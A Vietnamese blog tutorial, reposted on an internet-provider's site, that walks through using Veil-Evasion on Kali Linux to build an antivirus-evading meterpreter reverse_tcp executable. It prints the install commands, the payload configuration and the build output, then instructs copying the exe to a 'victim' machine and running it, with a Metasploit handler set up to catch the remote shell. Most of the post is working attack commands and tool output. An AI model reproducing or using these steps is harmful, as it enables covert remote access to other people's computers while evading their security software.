lắp mạng cáp quang fpt thái nguyên

Hướng dẫn dùng Veil tạo payload bypass antivirus

Chủ Nhật, tháng 4 17, 2016 Edit this post

1. Veil là gì? Veil được biết đến như là một công cụ có khả năng vượt qua những trình diệt virus cơ bản được dùng trong hoạt động pentesting...


1. Veil là gì?

Veil được biết đến như là một công cụ có khả năng vượt qua những trình diệt virus cơ bản được dùng trong hoạt động pentesting. Veil làm việc này bằng cách tạo ra một payloads ngẫu nhiên và duy nhất.Chúng ta có thể so sánh những payloads này giống nhưng những malware đa hình, khác nhau giữa host này với host kia. Những payloads này hay hơn những malware truyền thống ở chỗ nó có khả năng thay đổi chữ ký – điều mà một chương trình diệt virus thường dùng (tất nhiên là chương trình diệt virus còn dùng cách khác) để xác định malware. Những mã khai thác của Veil tương thích với hầu hết những công cụ pentest như Metasploit.
2. Dùng như thế nào?
Bài này tác giả sử dụng Kali Linux làm máy tấn công và một máy tính khác chạy Windows XP SP2 với chương trình diệt virus ClamWin. Tác giả khẳng định nó hoạt động với các chương trình diệt virus cơ bản khác.
Đầu tiên là cài Veil vì nó không được tích hợp sẵn trên Kali Linux

root@kali:~# wget https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
root@kali:~# unzip master
root@kali:~# cd Veil-Evasion-master/setup
root@kali:~/Veil-Evasion-master/setup# ./setup.sh
Chạy veil
root@kali:~/Veil-Evasion-master/setup# cd ..
root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py
Bạn sẽ thấy một menu tương tác như thế này:
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Main Menu
39 payloads loaded
Available commands:
use                         use a specific payload
info                        information on a specific payload
list          list available payloads
update                 update Veil to the latest version
clean                     clean out payload folders
checkvt                check payload hashes vs. VirusTotal
exit        exit Veil
[>] Please enter a command:
Dùng thử những command để hiểu hơn về Veil, ví dụ như list, info..
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload information:
Name:                  python/meterpreter/rev_tcp
Language:           python
Rating:                  Excellent
Description:    pure windows/meterpreter/reverse_tcp stager, no
shellcode
Required Options:
Name                                   Current Value    Description
—-                                        ————-          ———–
LHOST                                  IP of the metasploit handler
LPORT                  4444       Port of the metasploit handler
compile_to_exe              Y              Compile to an executable
expire_payload               X             Optional: Payloads expire after “X” days
use_pyherion                   N             Use the pyherion encrypter
Để dùng một payload thì bạn chọn command use và mã số payloads có được từ lệnh list
[>] Please enter a command: use 26
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload: python/meterpreter/rev_tcp loaded
Required Options:
Name                                   Current Value    Description
—-                                        ————-          ———–
LHOST                                  IP of the metasploit handler
LPORT                  4444       Port of the metasploit handler
compile_to_exe              Y              Compile to an executable
expire_payload               X             Optional: Payloads expire after “X” days
use_pyherion                   N             Use the pyherion encrypter
Available commands:
set         set a specific option value
info                        show information about the payload
generate             generate payload
back                       go to the main menu
exit        exit Veil
[>] Please enter a command: set LHOST 192.168.0.14
[>] Please enter a command: generate
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Press [enter] for ‘payload’
[>] Please enter the base name for output files: testPayload
[?] How would you like to create your payload executable?
1 – Pyinstaller (default)
2 – Pwnstaller (obfuscated Pyinstaller loader)
3 – Py2Exe
[>] Please enter the number of your choice: 1
err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
130 INFO: wrote Z:\root\Veil-Evasion-master\testPayload.spec
176 INFO: Testing for ability to set icons, version resources…
189 INFO: … resource update available
191 INFO: UPX is not available.
1707 INFO: checking Analysis
1707 INFO: building Analysis because out00-Analysis.toc non existent
1707 INFO: running Analysis out00-Analysis.toc
1709 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1717 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww …
1717 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest
1720 INFO: Searching for file msvcr90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll
1720 INFO: Searching for file msvcp90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll
1720 INFO: Searching for file msvcm90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll
1878 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py
3434 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py
3625 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py
3832 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py
3881 INFO: Analyzing /usr/share/veil-output/source/testPayload.py
4082 INFO: Hidden import ‘encodings’ has been found otherwise
4084 INFO: Looking for run-time hooks
4084 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py
4904 INFO: Warnings written to Z:\root\Veil-Evasion-master\build\pyi.win32\testPayload\warntestPayload.txt
4911 INFO: checking PYZ
4911 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4911 INFO: building PYZ out00-PYZ.toc
5546 INFO: checking PKG
5546 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5546 INFO: building PKG out00-PKG.pkg
6628 INFO: checking EXE
6628 INFO: rebuilding out00-EXE.toc because testPayload.exe missing
6628 INFO: building EXE from out00-EXE.toc
6633 INFO: Appending archive to EXE Z:\root\Veil-Evasion-master\dist\testPayload.exe
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Executable written to: /usr/share/veil-output/compiled/testPayload.exe
Language:                          python
Payload:                              python/meterpreter/rev_tcp
Required Options:      LHOST=192.168.0.14  LPORT=4444  compile_to_exe=Y
expire_payload=X  use_pyherion=N
Payload File:                      /usr/share/veil-output/source/testPayload.py
Handler File:                      /usr/share/veil-output/handlers/testPayload_handler.rc
[*] Your payload files have been generated, don’t get caught!
[!] And don’t submit samples to any online scanner! 😉
Nó nhắc các bạn là đừng có submit payload này lên mấy trang scan online kìa Shy
Xong, như vậy bạn đã có 1 file exe có khả năng bypass được một số antivirus (hi vọng thế)
Bước tiếp theo là copy file đó lên máy victim và chạy nó. Trên Kali Linux chúng ta sẽ mở một cái handler cho cái reverse tcp
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.14
LHOST => 192.168.0.14
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
Theo: http://forum.ceh.vn/Huong-dan-dung-Veil-tao-payload-bypass-antivirus-thread-7431-post-28093.ceh#pid28093

Nhãn:

SHARE:

Twitter Facebook Google Pinterest
Ads Here
Internet - Truyền hình -Camera FPT
0975.166.103 - 0941.468.700
Website: www.fptthainguyen.org
www.cameragiamsatthainguyen.com
FanPage: FB.com/truyenhinhFPTThaiNguyen
Hotline: 0975166103
Tên

1st,2,8051,3,AAG,1,ADS,2,ADSL,2,AIO,1,Alarm,1,Altcoin,1,AMD,2,Amplifier,4,Android,2,Android TV,3,AOE,1,APG,1,APK,2,ASIC,2,ATX,2,AVG,3,Ấp trứng,2,Bàn phím cơ,1,Bản quyền,1,baner,3,Bảng giá,5,Banggood,1,Báo giá,1,Báo hỏng,1,Bảo Mật,4,BCC,1,BCN,1,Binance,1,Bitcoin,5,Bitmex,1,Bittrex,1,BIX,1,blogger,2,BNB,1,Bóng đá,2,bootrom,1,BTC,4,Build PC,1,ByteCoin,1,cable,1,Cài đặt,3,Cài Win,2,Camera,6,Camera giám sát,3,camera IP,2,Cáp quang,9,Cáp quang Cá nhân,2,Cáp quang Doanh nghiệp,1,Cat5e,1,Cấu hình máy,1,CCTV,1,Chống nước,1,Clicksense,2,Cloud,1,Cloud camera,2,Code,8,Code FPT,1,Code web,8,coin,5,Combo,1,Controller,1,Covid-19,9,Công nghệ mới,1,Cryptocurrency,26,Cung hoàng đạo,1,DAG,1,Dây mạng,1,DDos,39,DEEP WEB,3,Dịch vụ FPT,4,DIY,8,Đại Từ,2,Đánh giá,5,Đào coin,6,Đâu là đúng,5,Địa chỉ,1,Điện thoại,2,Điều khiển giọng nói,1,Đồng hồ,1,Electronics,1,English,2,epon,1,ETC,1,ETH,6,Facebook,10,featured,1,Foxy,1,fpt,12,FPT camera,7,FPT internet,3,FPT Play,2,FPT Play Box,32,FPT Playbox,3,FPT Telecom,5,FPT Thái Nguyên,6,FPT TV,1,FPT TV 4K,1,FPT TVOnly,1,fshare,1,G-97D2,3,G97RG6M1,1,Game,2,Game gear,1,Game PC,2,getlink,1,Ghost,2,Ghost Windows 10,2,Ghost Windows 7,7,Gói cá nhân,2,Gói cước,2,Gói cước FPT,8,Gói Doanh Nghiệp,4,Gói kênh FPT Play,1,Gói max,1,GPON,3,GPU,2,Hà Nội,1,Hacker,1,Hàn Quốc,1,HBO,1,HG531,2,Hi FPT,3,HiFPT,1,Học Online,1,Hot,15,houbi,3,HT,1,HTC,1,Hướng dẫn,10,Hướng dẫn FPT,8,IC555,4,ICO,3,Ifan,1,Infographic,2,internet,8,Inverter,1,IP tĩnh,1,IPTV,1,ISO,1,K+,1,KCS,1,Key,1,keypad,1,Kho Tut,59,Khuyến mại,10,kích sóng wifi,1,Kiếm tiền trên mạng,1,Kiến thức,2,Kinh nghiệm,1,Lan,1,Laptop,1,Lắp mạng,4,LED,6,leech link,1,Li-Ion,1,Light,1,LM386,1,Love,2,Lừa đảo,1,Ma kết,1,Mạch Audio,1,Mạch điện tử,1,Mạch sạc,5,Mainboard,1,Mạng chậm,1,Mạng internet,3,Mạng LAN,3,Máy ảnh,1,Máy tính,3,Mesh,2,Meter,1,Miband,3,Microsoft,1,Minning,4,MMO,3,Mobile,3,Modem,17,Mở két,1,Music,1,Netflix,1,News,7,Ngoại ngữ,1,Nguồn,3,Nvidia,1,offer,1,Office,2,Onedrive,1,Online,1,OS,2,Others,1,Paypal,1,PC,1,PCB,1,PDF,1,Phấn Mễ,1,Phần mềm,2,Phim,1,Phòng nét,1,Photo,1,Phổ Yên,1,Phú Lương,1,Phụ nữ,1,PIC,2,Pin - Ắc qui,4,proxy,1,PUBG,1,Python,4,Remitano,3,Repeater,1,Review,4,Review FPT,2,Root,1,Router,3,Rút gọn link,1,sạc dụng phòng,1,Sạc điện thoại,1,Sàn giao dịch,2,Scam,3,Sensor,2,setup,2,smarthome,1,Softwares,5,sonoff,1,SQL,3,Super 22,2,Tài liệu,178,Tenda Nova MW3,1,Thái Nguyên,19,Thẻ visa,1,Thể thao,1,Thi công,1,Thơ thẩn,3,Thủ thuật,86,Tiền bạc,1,Tiền điện tử,3,Tin FPT,5,Tin tức,41,Tình yêu,4,Tivi box,1,Tivi Gold,1,TNUT,1,Tool,2,Tool đào coin,6,Tools,45,Tổng đài,1,TP Link,1,TP-Link,3,trade coin,8,Trading,1,Transitsor,2,Trâu cày,2,Truyện,3,Truyền hình,4,Truyền hình FPT,32,Tuyển dụng,4,Tư vấn,4,TV Box,3,UG,15,USB,1,USDT,2,VGA,1,Video,1,Viettel,2,Viễn thông,1,Vinaphone,1,Virus,11,VPN,1,Web,1,wifi,18,wifi 6,1,Wifi Maketting,1,Window XP,3,Windows,4,Windows 10,6,Windows 10 Mobile,1,Windows 7,2,Xiaomi,4,XMR,2,Youtube,1,Zcash,1,Zec,1,
ltr
item
Tổng đài lắp mạng FPT Thái Nguyên 0975166103 |Cáp quang | Wifi | Truyền hình FPT| Camera Cloud: Hướng dẫn dùng Veil tạo payload bypass antivirus
Hướng dẫn dùng Veil tạo payload bypass antivirus
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxT6atSMfHWNlKTyN-hHdAB8J6a24iXp6Rdpp1jDDCJqBM_h2Vtp_zo59AOnsyuRNLFmTEh3V3g2FskJtbG3jDY6upNgZCRX_mzlUsLjVlaWqlt52JlaVXg-pVzMUliS4Wnlj-9OYtGvM/s320/12985384_236115663442693_6426771475240931709_n.jpg
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxT6atSMfHWNlKTyN-hHdAB8J6a24iXp6Rdpp1jDDCJqBM_h2Vtp_zo59AOnsyuRNLFmTEh3V3g2FskJtbG3jDY6upNgZCRX_mzlUsLjVlaWqlt52JlaVXg-pVzMUliS4Wnlj-9OYtGvM/s72-c/12985384_236115663442693_6426771475240931709_n.jpg
Tổng đài lắp mạng FPT Thái Nguyên 0975166103 |Cáp quang | Wifi | Truyền hình FPT| Camera Cloud
https://www.xn--fptthinguyn-o7a6j.vn/2016/04/huong-dan-dung-veil-tao-payload-bypass.html
https://www.xn--fptthinguyn-o7a6j.vn/
https://www.xn--fptthinguyn-o7a6j.vn/
https://www.xn--fptthinguyn-o7a6j.vn/2016/04/huong-dan-dung-veil-tao-payload-bypass.html
true
8240370674769512952
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy